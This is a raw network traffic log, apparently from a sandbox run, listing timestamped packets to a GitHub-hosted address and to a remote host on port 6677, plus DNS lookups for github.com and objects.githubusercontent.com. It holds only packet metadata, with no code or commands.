                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881330013 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881350040 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881386042 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881386995 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881401062 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881417036 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881437063 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.881443977 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998047113 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998061895 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998183966 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998228073 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998253107 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998279095 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:27.998296976 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.042352915 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.042412996 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.042485952 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.042505980 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.042535067 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.089735031 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159589052 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159605026 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159648895 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159687996 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159687996 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159706116 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159739017 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.159764051 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.233458996 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.233484983 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.233613968 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.233632088 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.233690023 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.350327969 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.350353956 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.350474119 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.350493908 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.350537062 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.466960907 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.466986895 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.467061996 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.467082024 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.467125893 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.511214972 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.511241913 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.511348963 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.511365891 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.511414051 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.628045082 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.628081083 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.628195047 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.628213882 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.628278017 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.701356888 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.701381922 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.701527119 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.701548100 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.701591969 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.746151924 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.746174097 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.746272087 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.746293068 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.746332884 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.858613014 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.858647108 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.858722925 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.858741045 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.858771086 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.858791113 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.905936956 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.906008005 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.906024933 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.906025887 CET44349708185.199.111.133192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.906049013 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.906069040 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:28.906717062 CET49708443192.168.2.9185.199.111.133
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:33.201752901 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:34.143117905 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:34.143505096 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:34.162354946 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:34.167248964 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858545065 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858581066 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858591080 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858633995 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858645916 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858666897 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858688116 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858700037 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858712912 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858800888 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858846903 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858884096 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858896017 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858907938 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858949900 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.858992100 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859004974 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859040976 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859147072 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859158993 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859178066 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859205961 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859217882 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859297037 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859384060 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859397888 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859483957 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859544039 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859560966 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859571934 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859586954 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859677076 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859690905 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859755993 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859790087 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859813929 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859826088 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859837055 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859838963 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859852076 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859865904 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859875917 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859891891 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859934092 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859947920 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859957933 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.859987020 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.860023022 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.860049963 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.862621069 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.862653971 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.862732887 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.862803936 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.862817049 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.862838984 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.862853050 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.862921953 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.862936020 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.862952948 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.862977028 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.862988949 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863105059 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863162994 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863177061 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863193989 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863271952 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863282919 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863296032 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863306999 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863375902 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863388062 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863399982 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863410950 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863452911 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863466978 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863481045 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863492966 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863591909 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863609076 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863621950 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863648891 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863660097 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863687038 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863698006 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863703012 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863715887 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863737106 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863801003 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863812923 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.863907099 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.864779949 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947191000 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947205067 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947217941 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947232008 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947243929 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947256088 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947268009 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947279930 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947292089 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947304964 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947340965 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947352886 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947362900 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947381973 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947387934 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947408915 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947423935 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947439909 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947452068 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947467089 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947482109 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947494030 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947520018 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947530985 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947541952 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947606087 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947618008 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947638988 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947660923 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947671890 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947684050 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947737932 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947750092 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947771072 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947818041 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947829962 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947840929 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947861910 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947874069 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947901964 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.947913885 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.948237896 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.948250055 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.948261976 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.948273897 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.948287010 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.948298931 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.948311090 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.948324919 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.948350906 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.948362112 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952421904 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952537060 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952548981 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952563047 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952574015 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952621937 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952682018 CET497096677192.168.2.94.251.123.83
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952693939 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952708960 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952750921 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952763081 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952845097 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952893972 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952941895 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.952975988 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953042030 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953088045 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953133106 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953159094 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953183889 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953197956 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953206062 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953211069 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953267097 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953279018 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953299046 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953310966 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953345060 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953356981 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953455925 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953468084 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953483105 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953500986 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953526020 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953541040 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953552008 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953562975 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953624964 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953636885 CET6677497094.251.123.83192.168.2.9
                                                                                                                                                                                                                                              Nov 12, 2024 14:50:39.953648090 CET6677497094.251.123.83192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 12, 2024 14:50:24.421873093 CET | 50696 | 53 | 192.168.2.9 | 1.1.1.1
Nov 12, 2024 14:50:24.429701090 CET | 53 | 50696 | 1.1.1.1 | 192.168.2.9
Nov 12, 2024 14:50:26.363835096 CET | 54910 | 53 | 192.168.2.9 | 1.1.1.1
Nov 12, 2024 14:50:26.370774031 CET | 53 | 54910 | 1.1.1.1 | 192.168.2.9
Nov 12, 2024 14:50:36.807626009 CET | 53 | 60319 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 12, 2024 14:50:24.421873093 CET | 192.168.2.9 | 1.1.1.1 | 0x422d | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
Nov 12, 2024 14:50:26.363835096 CET | 192.168.2.9 | 1.1.1.1 | 0x70cb | Standard query (0) | objects.githubusercontent.com | A (IP address) | IN (0x0001) | false
